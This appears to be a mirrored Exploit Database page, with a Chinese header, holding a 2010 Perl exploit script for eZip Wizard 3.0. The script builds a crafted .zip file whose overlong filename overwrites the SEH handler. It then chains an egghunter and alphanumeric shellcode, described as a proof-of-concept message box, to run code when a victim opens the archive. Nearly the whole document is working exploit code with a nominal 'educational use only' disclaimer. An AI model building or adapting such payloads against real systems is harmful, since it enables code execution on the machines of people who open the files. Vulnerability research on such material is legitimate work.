eZip Wizard 3.0 – ‘.zip’ File (SEH)

Exploit Database
105 阅读

作者： Lincoln & corelanc0d3r

日期： 2010-04-04
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/12059/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

#!/usr/bin/perl

# Software: eZip Wizard 3.0 (.zip)

# Author: Lincoln & corelanc0d3r

# Discovered by : fl0 fl0w

# Reference : http://www.exploit-db.com/exploits/8180

# OS: Windows

# Tested on : XP SP3 En (VirtualBox)

# Type of vuln: SEH

# Greetz to : Corelan Security Team & fl0 fl0w

# http://www.corelan.be:8800/index.php/security/corelan-team-members/

# Script provided 'as is', without any warranty.

# Use for educational purposes only.

# Do not use this code to do anything illegal !

# Note : you are not allowed to edit/modify this code.

# If you do, Corelan cannot be held responsible for any damages this may cause.

#Double click on file name inside wizard to trigger exploit

# Code :

print "|------------------------------------------------------------------|\n";

print "| __ __|\n";

print "| _________________/ /___ _____ / /________ _____ ___|\n";

print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n";

print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n";

print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n";

print "||\n";

print "| http://www.corelan.be:8800 |\n";

print "||\n";

print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";

print "[+] Exploit for eZip Wizard 3.0 \n";

my $filename="ezip.zip";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00" .

"\xc4\x09" .# 2500

"\x00\x00\x00";

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .

"\x00\x00\x00\x00\x00\x00\x00\x00\x00".

"\xc4\x09". # 2500

"\x00\x00\x00\x00\x00\x00\x01\x00".

"\x24\x00\x00\x00\x00\x00\x00\x00";

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".

"\xf2\x09\x00\x00". # +46

"\xe2\x09\x00\x00". # +30

"\x00\x00";

#align regs into esp

my $align =

"\x61" x 29 .

"\x58\x58\x41";

#esp base reg

my $egg=

"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI0fK1y".

"ZKODOQRsbSZ4BRxXMVN5lUUqJqdXoMh2WP0FPrTLKKJNOBUXjLo1ekWyo".

"JGA";

#msgbox: "Exploited by Corelan Security Team"

my $shellcode =

"w00tw00t".

"\x89\xe3\xda\xd7\xd9\x73\xf4\x59\x49\x49\x49\x49\x49\x49" .

"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" .

"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" .

"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" .

"\x75\x4a\x49\x4a\x79\x4a\x4b\x4d\x4b\x4b\x69\x51\x64\x45" .

"\x74\x4a\x54\x45\x61\x4e\x32\x4e\x52\x42\x5a\x46\x51\x49" .

"\x59\x42\x44\x4e\x6b\x51\x61\x44\x70\x4c\x4b\x43\x46\x44" .

"\x4c\x4e\x6b\x42\x56\x47\x6c\x4c\x4b\x51\x56\x44\x48\x4c" .

"\x4b\x51\x6e\x45\x70\x4e\x6b\x45\x66\x50\x38\x50\x4f\x47" .

"\x68\x50\x75\x4c\x33\x50\x59\x45\x51\x4b\x61\x4b\x4f\x48" .

"\x61\x51\x70\x4c\x4b\x50\x6c\x46\x44\x45\x74\x4c\x4b\x51" .

"\x55\x47\x4c\x4c\x4b\x50\x54\x43\x35\x50\x78\x43\x31\x4b" .

"\x5a\x4c\x4b\x42\x6a\x47\x68\x4e\x6b\x43\x6a\x47\x50\x45" .

"\x51\x4a\x4b\x48\x63\x46\x57\x50\x49\x4e\x6b\x44\x74\x4c" .

"\x4b\x45\x51\x4a\x4e\x44\x71\x49\x6f\x50\x31\x4b\x70\x4b" .

"\x4c\x4e\x4c\x4f\x74\x4b\x70\x43\x44\x46\x6a\x4a\x61\x4a" .

"\x6f\x44\x4d\x47\x71\x4b\x77\x48\x69\x4a\x51\x4b\x4f\x49" .

"\x6f\x49\x6f\x45\x6b\x43\x4c\x45\x74\x51\x38\x51\x65\x49" .

"\x4e\x4e\x6b\x42\x7a\x45\x74\x45\x51\x4a\x4b\x43\x56\x4e" .

"\x6b\x46\x6c\x42\x6b\x4c\x4b\x43\x6a\x45\x4c\x43\x31\x4a" .

"\x4b\x4e\x6b\x45\x54\x4e\x6b\x47\x71\x4d\x38\x4f\x79\x51" .

"\x54\x46\x44\x47\x6c\x45\x31\x4a\x63\x4f\x42\x44\x48\x46" .

"\x49\x48\x54\x4f\x79\x4b\x55\x4d\x59\x49\x52\x50\x68\x4c" .

"\x4e\x50\x4e\x44\x4e\x48\x6c\x50\x52\x4b\x58\x4d\x4c\x4b" .

"\x4f\x49\x6f\x4b\x4f\x4f\x79\x51\x55\x46\x64\x4d\x6b\x51" .

"\x6e\x49\x48\x4d\x32\x51\x63\x4c\x47\x45\x4c\x44\x64\x51" .

"\x42\x4d\x38\x4e\x6b\x49\x6f\x49\x6f\x4b\x4f\x4c\x49\x42" .

"\x65\x47\x78\x43\x58\x42\x4c\x50\x6c\x45\x70\x4b\x4f\x51" .

"\x78\x47\x43\x45\x62\x46\x4e\x45\x34\x45\x38\x51\x65\x51" .

"\x63\x45\x35\x44\x32\x4d\x58\x51\x4c\x44\x64\x44\x4a\x4c" .

"\x49\x48\x66\x43\x66\x4b\x4f\x43\x65\x46\x64\x4c\x49\x4b" .

"\x72\x50\x50\x4d\x6b\x4e\x48\x4c\x62\x50\x4d\x4d\x6c\x4e" .

"\x67\x47\x6c\x47\x54\x46\x32\x4b\x58\x43\x6e\x49\x6f\x49" .

"\x6f\x49\x6f\x42\x48\x51\x74\x45\x71\x51\x48\x45\x70\x43" .

"\x58\x44\x30\x43\x47\x42\x4e\x42\x45\x44\x71\x4b\x6b\x4b" .

"\x38\x43\x6c\x45\x74\x46\x66\x4b\x39\x48\x63\x45\x38\x50" .

"\x61\x42\x4d\x50\x58\x45\x70\x51\x78\x42\x59\x45\x70\x50" .

"\x54\x51\x75\x51\x78\x44\x35\x43\x42\x50\x69\x51\x64\x43" .

"\x58\x51\x30\x43\x63\x45\x35\x43\x53\x51\x78\x42\x45\x42" .

"\x4c\x50\x61\x50\x6e\x42\x48\x51\x30\x51\x53\x50\x6f\x50" .

"\x72\x45\x38\x43\x54\x51\x30\x50\x62\x43\x49\x51\x78\x42" .

"\x4f\x43\x59\x42\x54\x50\x65\x51\x78\x42\x65\x51\x68\x42" .

"\x50\x50\x6c\x46\x51\x48\x49\x4e\x68\x50\x4c\x46\x44\x45" .

"\x72\x4d\x59\x49\x71\x44\x71\x4a\x72\x43\x62\x43\x63\x50" .

"\x51\x46\x32\x4b\x4f\x48\x50\x50\x31\x4f\x30\x46\x30\x4b" .

"\x4f\x51\x45\x44\x48\x45\x5a\x41\x41";

# --- payload ---

my $size=2496;

my $junksize=50;#This offset may need to be adjusted by a few bytes

my $junk="Admin passwords.txt";

$junk=$junk.(" " x ($junksize-length($junk)));

my $nseh= "\x61\x61\x7a\x04";

my $seh = "\x10\x07\x02\x10"; #universal

my $payload = $junk.$nseh.$seh.$align.$egg.$shellcode;

my $rest = "D" x ($size - length($payload));

$payload = $payload . $rest. ".txt";

print "[+] Size : " . length($payload)."\n";

system("del $filename");

print "[+] Creating new vulnerable file: $filename\n\n";

open(FILE, ">$filename");

print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;

close(FILE);